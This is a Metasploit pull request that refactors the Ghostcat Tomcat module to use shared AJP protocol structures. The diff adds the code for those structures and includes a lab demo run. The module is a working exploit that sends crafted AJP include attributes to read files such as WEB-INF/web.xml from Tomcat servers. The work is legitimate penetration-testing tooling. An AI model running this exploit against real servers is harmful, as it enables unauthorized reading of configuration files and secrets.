### PR TITLE
Refactor the ghostcat module to use the AJP definitions provided by Rex::Proto

### DIFF
--- a/lib/rex/proto/apache_j_p.rb
+++ b/lib/rex/proto/apache_j_p.rb
@@ -33,8 +33,9 @@ module Rex::Proto::ApacheJP
     end
   end
 
-  class ApacheJPReqHeaderName < BinData::Primitive
-    COMMON_HEADERS = %w{ accept accept-charset accept-encoding accept-language authorization connection content-type content-length cookie cookie2 host pragma referer user-agent }
+  class ApacheJPHeaderName < BinData::Primitive
+    COMMON_HEADERS = []
+
     endian :big
 
     uint16  :len_or_code
@@ -42,14 +43,14 @@ module Rex::Proto::ApacheJP
 
     def get
       if len_or_code >= 0xa000
-        COMMON_HEADERS[(len_or_code.to_i & 0xff) - 1]
+        self.class::COMMON_HEADERS[(len_or_code.to_i & 0xff) - 1]
       else
         self.data
       end
     end
 
     def set(v)
-      if (idx = COMMON_HEADERS.index(v))
+      if (idx = self.class::COMMON_HEADERS.index(v))
         self.len_or_code = 0xa000 | (idx + 1)
       else
         raise RuntimeError if v.length >= 0xa000
@@ -60,10 +61,25 @@ module Rex::Proto::ApacheJP
     end
   end
 
+  class ApacheJPReqHeaderName < ApacheJPHeaderName
+    COMMON_HEADERS = %w{ accept accept-charset accept-encoding accept-language authorization connection content-type content-length cookie cookie2 host pragma referer user-agent }
+  end
+
+  class ApacheJPResHeaderName < ApacheJPHeaderName
+    COMMON_HEADERS = %w{ Content-Type Content-Language Content-Length Date Last-Modified Location Set-Cookie Set-Cookie2 Servlet-Engine Status WWW-Authentication }
+  end
+
   class ApacheJPRequestHeader < BinData::Record
     endian :big
 
     apache_jp_req_header_name :header_name
+    apache_jp_string          :header_value
+  end
+
+  class ApacheJPResponseHeader < BinData::Record
+    endian :big
+
+    apache_jp_res_header_name :header_name
     apache_jp_string          :header_value
   end
 
@@ -83,6 +99,7 @@ module Rex::Proto::ApacheJP
     endian :big
 
     uint8            :code
+    apache_jp_string :attribute_name, onlyif: -> { code == CODE_REQ_ATTRIBUTE }
     apache_jp_string :attribute_value, onlyif: -> { code != CODE_TERMINATOR }
   end
 
@@ -108,10 +125,11 @@ module Rex::Proto::ApacheJP
     HTTP_METHOD_CHECKOUT = 19
     HTTP_METHOD_UNCHECKOUT = 20
     HTTP_METHOD_SEARCH = 21
+    PREFIX_CODE = 2
 
     endian :big
 
-    uint8             :prefix_code, value: 2
+    uint8             :prefix_code, value: PREFIX_CODE
     uint8             :http_method
     apache_jp_string  :protocol, initial_value: 'HTTP/1.1'
     apache_jp_string  :req_uri
@@ -123,5 +141,45 @@ module Rex::Proto::ApacheJP
     uint16            :num_headers, initial_value: -> { headers.length }
     array             :headers, type: :apache_jp_request_header, initial_length: :num_headers
     array             :attributes, type: :apache_jp_request_attribute, read_until: -> { element.code == ApacheJPRequestAttribute::TERMINATOR }
+  end
+
+  class ApacheJPSendBodyChunk < BinData::Record
+    PREFIX_CODE = 3
+
+    endian :big
+
+    uint8   :prefix_code, value: PREFIX_CODE
+    uint16  :body_chunk_length, initial_value: -> { body_chunk.length }
+    string  :body_chunk, read_length: :body_chunk_length
+  end
+
+  class ApacheJPSendHeaders < BinData::Record
+    PREFIX_CODE = 4
+
+    endian :big
+
+    uint8             :prefix_code, value: PREFIX_CODE
+    uint16            :http_status_code
+    apache_jp_string  :http_status_msg
+    uint16            :num_headers, initial_value: -> { header.length }
+    array             :headers, type: :apache_jp_response_header, initial_length: :num_headers
+  end
+
+  class ApacheJPEndResponse < BinData::Record
+    PREFIX_CODE = 5
+
+    endian :big
+
+    uint8              :prefix_code, value: PREFIX_CODE
+    apache_jp_boolean  :reuse
+  end
+
+  class ApacheJPGetBodyChunk < BinData::Record
+    PREFIX_CODE = 6
+
+    endian :big
+
+    uint8   :prefix_code, value: PREFIX_CODE
+    uint16  :requested_length
   end
 end

--- a/modules/auxiliary/admin/http/tomcat_ghostcat.rb
+++ b/modules/auxiliary/admin/http/tomcat_ghostcat.rb
@@ -1,6 +1,17 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/apache_j_p'
+
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Report
+
+  ApacheJP = Rex::Proto::ApacheJP
+
+  GhostCatResponse = Struct.new(:status, :headers, :body)
 
   def initialize(info = {})
     super(
@@ -49,157 +60,16 @@ class MetasploitModule < Msf::Auxiliary
     )
     register_options(
       [
-        Opt::RPORT(8080, true, 'The Apache Tomcat webserver port'),
-        OptString.new('FILENAME', [true, 'File name', '/WEB-INF/web.xml']),
-        OptBool.new('SSL', [true, 'SSL', false]),
-        OptPort.new('AJP_PORT', [false, 'The Apache JServ Protocol (AJP) port', 8009])
+        Opt::RPORT(8009, true, 'The Apache JServ Protocol (AJP) port'),
+        OptString.new('FILENAME', [true, 'File name', '/WEB-INF/web.xml'])
       ]
     )
-
-    @body_data = ''
-    @header_data = ''
-  end
-
-  def method2code(method)
-    methods = {
-      'OPTIONS' => 1,
-      'GET' => 2,
-      'HEAD' => 3,
-      'POST' => 4,
-      'PUT' => 5,
-      'DELETE' => 6,
-      'TRACE' => 7,
-      'PROPFIND' => 8
-    }
-    code = methods[method]
-    code
-  end
-
-  def make_headers(headers)
-    header2code = {
-      'accept' => "\xA0\x01",
-      'accept-charset' => "\xA0\x02",
-      'accept-encoding' => "\xA0\x03",
-      'accept-language' => "\xA0\x04",
-      'authorization' => "\xA0\x05",
-      'connection' => "\xA0\x06",
-      'content-type' => "\xA0\x07",
-      'content-length' => "\xA0\x08",
-      'cookie' => "\xA0\x09",
-      'cookie2' => "\xA0\x0A",
-      'host' => "\xA0\x0B",
-      'pragma' => "\xA0\x0C",
-      'referer' => "\xA0\x0D",
-      'user-agent' => "\xA0\x0E"
-    }
-    headers_ajp = []
-    headers.each do |(header_name, header_value)|
-      code = header2code[header_name].to_s
-
-      if code != ''
-        headers_ajp.append(code)
-      else
-        headers_ajp.append(ajp_string(header_name.to_s))
-      end
-      headers_ajp.append(ajp_string(header_value.to_s))
-    end
-
-    [int2byte(headers.length, 2), headers_ajp]
-  end
-
-  def make_attributes(attributes)
-    attribute2code = {
-      'remote_user' => "\x03",
-      'auth_type' => "\x04",
-      'query_string' => "\x05",
-      'jvm_route' => "\x06",
-      'ssl_cert' => "\x07",
-      'ssl_cipher' => "\x08",
-      'ssl_session' => "\x09",
-      'req_attribute' => "\x0A",
-      'ssl_key_size' => "\x0B"
-    }
-    attributes_ajp = []
-    attributes.each do |attr|
-      name = attr.keys.first.to_s
-      code = (attribute2code[name]).to_s
-      value = attr[name]
-      next unless code != ''
-
-      attributes_ajp.append(code)
-      if code == "\x0A"
-        value.each do |v|
-          attributes_ajp.append(ajp_string(v.to_s))
-        end
-      else
-        attributes_ajp.append(ajp_string(value.to_s))
-      end
-    end
-
-    attributes_ajp
-  end
-
-  def ajp_string(message_bytes)
-    "#{int2byte(message_bytes.length, 2)}#{message_bytes}\x00"
-  end
-
-  def int2byte(data, byte_len = 1)
-    if byte_len == 1
-      [data].pack('C')
-    else
-      [data].pack('n*')
-    end
-  end
-
-  def make_forward_request_package(method, headers, attributes)
-    prefix_code_int = 2
-    prefix_code_bytes = int2byte(prefix_code_int)
-    method_bytes = int2byte(method2code(method))
-    protocol_bytes = 'HTTP/1.1'
-    req_uri_bytes = '/index.txt'
-    remote_addr_bytes = '127.0.0.1'
-    remote_host_bytes = 'localhost'
-    server_name_bytes = datastore['RHOST'].to_s
-
-    if datastore['SSL'] == true
-      is_ssl_boolean = 1
-    else
-      is_ssl_boolean = 0
-    end
-    server_port_int = datastore['RPORT']
-    if server_port_int.to_s == ''
-      server_port_int = (is_ssl_boolean ^ 1) * 80 + (is_ssl_boolean ^ 0) * 443
-    end
-    is_ssl_bytes = int2byte(is_ssl_boolean, 1)
-    server_port_bytes = int2byte(server_port_int, 2)
-    headers.append(['host', "#{server_name_bytes}:#{server_port_int}"])
-    num_headers_bytes, headers_ajp_bytes = make_headers(headers)
-
-    attributes_ajp_bytes = make_attributes(attributes)
-    message = []
-    message.append(prefix_code_bytes)
-    message.append(method_bytes)
-    message.append(ajp_string(protocol_bytes.to_s))
-    message.append(ajp_string(req_uri_bytes.to_s))
-    message.append(ajp_string(remote_addr_bytes.to_s))
-    message.append(ajp_string(remote_host_bytes.to_s))
-    message.append(ajp_string(server_name_bytes.to_s))
-    message.append(server_port_bytes)
-    message.append(is_ssl_bytes)
-    message.append(num_headers_bytes)
-    message += headers_ajp_bytes
-    message += attributes_ajp_bytes
-    message.append("\xff")
-    message_bytes = message.join
-    send_bytes = "\x12\x34#{ajp_string(message_bytes.to_s)}"
-
-    send_bytes
   end
 
   def send_recv_once(data)
     buf = ''
     begin
-      connect(true, { 'RHOST' => datastore['RHOST'].to_s, 'RPORT' => datastore['AJP_PORT'].to_i, 'SSL' => datastore['SSL'] })
+      connect
       sock.put(data)
       buf = sock.get(30) || ''
     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
@@ -210,101 +80,74 @@ class MetasploitModule < Msf::Auxiliary
     buf
   end
 
-  def read_buf_string(buf, idx)
-    content = ''
-    len = buf[idx..(idx + 2)].unpack('n')[0]
-    idx += 2
-    content += (buf[idx..(idx + len - 1)]).to_s
-    idx += len + 1
-    [idx, content]
-  end
+  def parse_response(buf)
+    parsed_response = GhostCatResponse.new
 
-  def parse_response(buf, idx)
-    common_response_headers = {
-      "\x01" => 'Content-Type',
-      "\x02" => 'Content-Language',
-      "\x03" => 'Content-Length',
-      "\x04" => 'Date',
-      "\x05" => 'Last-Modified',
-      "\x06" => 'Location',
-      "\x07" => 'Set-Cookie',
-      "\x08" => 'Set-Cookie2',
-      "\x09" => 'Servlet-Engine',
-      "\x0a" => 'Status',
-      "\x0b" => 'WWW-Authenticate'
-    }
-    idx += 2
-    idx += 2
-    if buf[idx] == "\x04"
-      idx += 1
-      print @header_data
-      @header_data += 'Status Code: '
-      idx += 2
-      idx, val = read_buf_string(buf, idx)
-      @header_data += val
-      @header_data += "\n"
-      header_num = buf[idx..(idx + 2)].unpack('n')[0]
-      idx += 2
+    until buf.empty?
+      chunk = buf[4...(4 + buf.unpack1('xxn'))]
+      buf = buf[(4 + chunk.length)...]
 
-      (1..header_num).each do |_i|
-        if buf[idx] == "\xA0"
-          idx += 1
-          @header_data += "#{common_response_headers[buf[idx]]}: "
-          idx += 1
-        else
-          idx, val = read_buf_string(buf, idx)
-          @header_data += val
-          @header_data += ': '
-        end
-
-        idx, val = read_buf_string(buf, idx)
-        @header_data += val
-        @header_data += "\n"
+      case chunk[0].ord
+      when ApacheJP::ApacheJPSendBodyChunk::PREFIX_CODE
+        send_body_chunk = ApacheJP::ApacheJPSendBodyChunk.read(chunk)
+        parsed_response.body = send_body_chunk.body_chunk.to_s
+      when ApacheJP::ApacheJPSendHeaders::PREFIX_CODE
+        send_headers = ApacheJP::ApacheJPSendHeaders.read(chunk)
+        parsed_response.status = send_headers.http_status_code.to_i
+        parsed_response.headers = send_headers.headers.snapshot.map { |header| [header.header_name.to_s, header.header_value.to_s] }.to_h
+      when ApacheJP::ApacheJPEndResponse::PREFIX_CODE
+        break
+      when ApacheJP::ApacheJPGetBodyChunk::PREFIX_CODE
+        next # no need to process this chunk
+      else
+        fail_with(Failure::UnexpectedReply, "Received unknown AJP prefix code: #{chunk[0].ord}")
       end
-    elsif buf[idx] == "\x05"
-      return 0
-    elsif buf[idx] == "\x03"
-      idx += 1
-      idx, val = read_buf_string(buf, idx)
-      @body_data += val
-    else
-      return 1
     end
 
-    parse_response(buf, idx)
+    parsed_response
   end
 
-  def read_success?(header)
-    # As far as we can tell, a successful status code can be either:
-    # 200
-    # 200 OK
-    # OK
-    # And so this should handle all three.
-    # See this issue for more details:
-    # https://github.com/rapid7/metasploit-framework/issues/15673
-
-    status_code = header.scan(/Status Code: (\w+)/).flatten.first
-
-    (status_code == '200' || status_code == 'OK')
+  def read_success?(ghost_cat_response)
+    ghost_cat_response.status == 200
   end
 
   def read_remote_file
-    headers = []
-    method = 'GET'
-    target_file = datastore['FILENAME'].to_s
-    attributes = [
-      { 'req_attribute' => ['javax.servlet.include.request_uri', 'index'] },
-      { 'req_attribute' => ['javax.servlet.include.path_info', target_file] },
-      { 'req_attribute' => ['javax.servlet.include.servlet_path', '/'] }
-    ]
-    data = make_forward_request_package(method, headers, attributes)
-    buf = send_recv_once(data)
-    parse_response(buf, 0)
+    ajp_forward_request = ApacheJP::ApacheJPForwardRequest.new(
+      http_method: ApacheJP::ApacheJPForwardRequest::HTTP_METHOD_GET,
+      req_uri: '/index.txt',
+      remote_addr: '127.0.0.1',
+      remote_host: 'localhost',
+      server_name: datastore['RHOST'].to_s,
+      headers: [
+        { header_name: 'host', header_value: "#{datastore['RHOST']}:8080" }
+      ],
+      attributes: [
+        {
+          code: ApacheJP::ApacheJPRequestAttribute::CODE_REQ_ATTRIBUTE,
+          attribute_name: 'javax.servlet.include.request_uri',
+          attribute_value: 'index'
+        },
+        {
+          code: ApacheJP::ApacheJPRequestAttribute::CODE_REQ_ATTRIBUTE,
+          attribute_name: 'javax.servlet.include.path_info',
+          attribute_value: datastore['FILENAME'].to_s
+        },
+        {
+          code: ApacheJP::ApacheJPRequestAttribute::CODE_REQ_ATTRIBUTE,
+          attribute_name: 'javax.servlet.include.servlet_path',
+          attribute_value: '/'
+        },
+        { code: ApacheJP::ApacheJPRequestAttribute::CODE_TERMINATOR }
+      ]
+    )
+
+    data = "\x12\x34" + [ ajp_forward_request.num_bytes ].pack('n') + ajp_forward_request.to_binary_s
+    parse_response(send_recv_once(data))
   end
 
   def check
-    read_remote_file
-    if read_success?(@header_data)
+    ghost_cat_response = read_remote_file
+    if read_success?(ghost_cat_response)
       return Exploit::CheckCode::Appears("Successfully read file #{datastore['FILENAME']}")
     end
 
@@ -314,18 +157,17 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    read_remote_file
-    print @header_data
-    print @body_data
+    ghost_cat_response = read_remote_file
+    print ghost_cat_response.body unless ghost_cat_response.body.blank?
 
-    if read_success?(@header_data)
-      file = store_loot(
-        datastore['FILENAME'].to_s, 'text/plain', datastore['RHOST'].to_s,
-        @body_data, 'Ghostcat File Read/Inclusion', 'Read file', datastore['FILENAME']
-      )
-      print_good file
-    else
+    unless read_success?(ghost_cat_response)
       print_error 'Unable to read file, target may not be vulnerable.'
     end
+
+    file = store_loot(
+      datastore['FILENAME'].to_s, 'text/plain', datastore['RHOST'].to_s,
+      ghost_cat_response.body, 'Ghostcat File Read/Inclusion', 'Read file', datastore['FILENAME']
+    )
+    print_good "File contents save to: #{file}"
   end
 end


### PR DESCRIPTION
In PR #18497 I added BinData definitions for Apache JServe Protocol (AJP) structures. In that PR, it was [suggested](https://github.com/rapid7/metasploit-framework/pull/18497#discussion_r1380173443) that the Ghostcat exploit be updated to use the definitions as well. This PR fulfills that request. It was necessary to add some additional definitions for the responses since the Ghostcat exploit needs to parse the response. The result is a net-reduction of about 100 lines of code with no loss of functionality.

I used the docker image from https://github.com/shaunmclernon/ghostcat-verification for testing. While verifying the module, and from reading analysis online it became apparent that this isn't actually an exploit that operates over HTTP. Rather the exploit makes a direct connection to the JServer service (TCP port 8009 by default). I also tested and noticed that the RPORT module doesn't seem to matter. Because of that, I moved the AJP_PORT option to be RPORT so the TCP mixin doesn't need to have special arguments sent to it's `#connect` method any more. It should also be more clear to the user that the connection is actually on `RPORT` now instead of the `AJP_PORT` option.

## Demo

```
msf6 auxiliary(admin/http/tomcat_ghostcat) > show options 

Module options (auxiliary/admin/http/tomcat_ghostcat):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   FILENAME  /WEB-INF/web.xml  yes       File name
   RHOSTS    192.168.159.128   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     8009              yes       The Apache JServ Protocol (AJP) port (TCP)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 192.168.159.128
<?xml version="1.0" encoding="ISO-8859-1"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
  version="3.1"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>

</web-app>

[+] 192.168.159.128:8009 - File contents save to: /home/smcintyre/.msf4/loot/20231117131558_default_192.168.159.128_WEBINFweb.xml_735642.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/tomcat_ghostcat) > 
```